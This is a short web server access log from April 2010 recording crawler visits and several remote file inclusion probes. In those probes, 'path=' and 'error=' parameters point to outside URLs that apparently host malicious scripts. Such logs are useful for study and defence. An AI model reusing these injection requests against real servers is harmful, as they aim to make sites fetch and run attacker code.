121.254.228.21 - - [19/Apr/2010:05:56:23 -0500] "GET /logs/access_log.1264896000//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [19/Apr/2010:05:56:23 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.21 - - [19/Apr/2010:05:56:25 -0500] "GET /logs/access_log.1264896000//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.254.228.21 - - [19/Apr/2010:05:56:25 -0500] "GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.254.228.21 - - [19/Apr/2010:05:56:25 -0500] "GET /logs//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 2334 "-""Mozilla/5.0"
207.46.13.136 - - [19/Apr/2010:06:00:00 -0500] "GET /logs/access_log.1257638400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/Apr/2010:06:02:25 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [19/Apr/2010:06:02:42 -0500] "GET /errors.php?error=http://www.syrianobles.com/website/cv/zfxid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.227.141.53 - - [19/Apr/2010:06:02:42 -0500] "GET /logs/access_log.1232236800/errors.php?error=http://www.syrianobles.com/website/cv/zfxid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
